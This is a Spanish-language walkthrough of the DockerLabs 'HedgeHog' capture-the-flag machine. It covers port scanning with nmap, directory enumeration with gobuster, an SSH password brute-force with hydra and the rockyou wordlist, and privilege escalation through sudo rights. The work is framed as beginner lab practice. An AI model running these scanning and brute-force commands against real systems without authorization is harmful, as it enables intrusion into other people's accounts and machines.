Ir al contenido

HedgeHog

En este artículo explico cómo resolví el CTF de la máquina virtual HedgeHog, creada por AnkbNikas. A lo largo del texto, detallo paso a paso las técnicas y herramientas empleadas para identificar y explotar las vulnerabilidades presentes.

  • Nombre: HedgeHog
  • Autor: AnkbNikas
  • Nivel de dificultad: Muy fácil
  • Fecha de creación: 10/11/2024

  1. Descargamos la máquina desde DockerLabs.

  2. Descomprimimos el archivo ZIP:

    Ventana de terminal
    unzip HedgeHog.zip
  3. Ejecutamos el script de despliegue:

    Ventana de terminal
    sudo bash auto_deplo.sh HedgeHog.tar

La máquina muestra su IP al iniciarse, por lo que no fue necesario un escaneo ARP.

IP asignada

Creamos un entorno de trabajo estructurado con la función mkt, que genera automáticamente las carpetas content, exploits, nmap y scripts.

Ventana de terminal
mkdir HedgeHog
cd HedgeHog
mkt

Ejecutamos un escaneo completo de puertos:

Ventana de terminal
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 172.17.0.2 -oG allPorts

Extraemos los puertos abiertos:

Ventana de terminal
extractPorts allPorts

Puertos detectados

Luego analizamos el puerto 80:

Ventana de terminal
nmap -sCV -p80 172.17.0.2 -oN targeted

Servicios detectados

Enumeramos directorios accesibles en el servidor HTTP:

Ventana de terminal
gobuster dir -u http://172.17.0.2/ \
-w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt \
-x php,html,txt,js -t 200

Resultados de Gobuster

Solo se detectó la existencia del archivo index, cuyo contenido es simplemente la palabra tails.

Archivo index


El contenido del archivo index sugiere que la palabra tails podría ser un nombre de usuario. Como no se detectaron otras vulnerabilidades web, intentamos un ataque de fuerza bruta por SSH utilizando hydra:

Ventana de terminal
hydra -l tails -P /usr/share/wordlists/rockyou.txt ssh://172.17.0.2 -t 4

Hydra

Hydra logra encontrar la contraseña correcta, lo que nos permite iniciar sesión mediante SSH:

Acceso como tails


Verificamos si el usuario tails puede ejecutar comandos con:

Ventana de terminal
sudo -l

sudo -l

El resultado indica que el usuario puede ejecutar cualquier comando con el binario sonic, lo que permite escalar privilegios fácilmente.

Acceso root


  • La máquina es ideal como introducción a CTFs y pentesting básico.
  • Requiere habilidades fundamentales de escaneo, enumeración y ataque por fuerza bruta.
  • El vector principal de explotación es simple, lo que la hace perfecta para principiantes.